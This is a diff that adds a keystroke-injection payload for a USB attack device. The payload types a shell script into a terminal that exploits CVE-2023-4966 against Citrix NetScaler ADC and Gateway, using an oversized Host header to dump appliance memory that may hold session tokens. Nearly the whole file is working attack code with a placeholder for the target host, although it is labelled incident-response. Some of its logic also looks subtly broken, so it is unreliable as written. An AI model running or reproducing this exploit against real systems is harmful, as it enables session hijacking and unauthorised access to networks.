Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966

payloads/library/execution/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt

@@ -0,0 +1,48 @@
+* REM ##################################################################################
+* REM #                                                                                #
+* REM # Title       : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966   #
+* REM # Author	    : Aleff                                                            #
+* REM # Version	    : 1.0                                                              #
+* REM # Category	  : incident-response                                                #
+* REM # Target	    : Citrix NetScaler ADV; NetScaler Gateway                          #
+* REM #                                                                                #
+* REM ##################################################################################
+
+* REM GNU/Linux Version
+
+QUACK DELAY 3000
+QUACK CTRL-ALT t
+QUACK DELAY 1000
+
+QUACK STRING header_value=$(yes a | head -n 24576 | tr -d '\n')
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING headers="-H 'Host:$header_value'"
+QUACK ENTER
+QUACK DELAY 500
+
+* REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
+QUACK STRING response=$(curl -s -k -H "$headers" "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
+QUACK ENTER
+QUACK DELAY 500
+
+QUACK STRING if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING echo "--- Dumped memory ---"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING echo "$response" | cut -c 131051-
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING echo "---      End      ---"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING else
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING echo "Could not dump memory"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING fi
+QUACK ENTER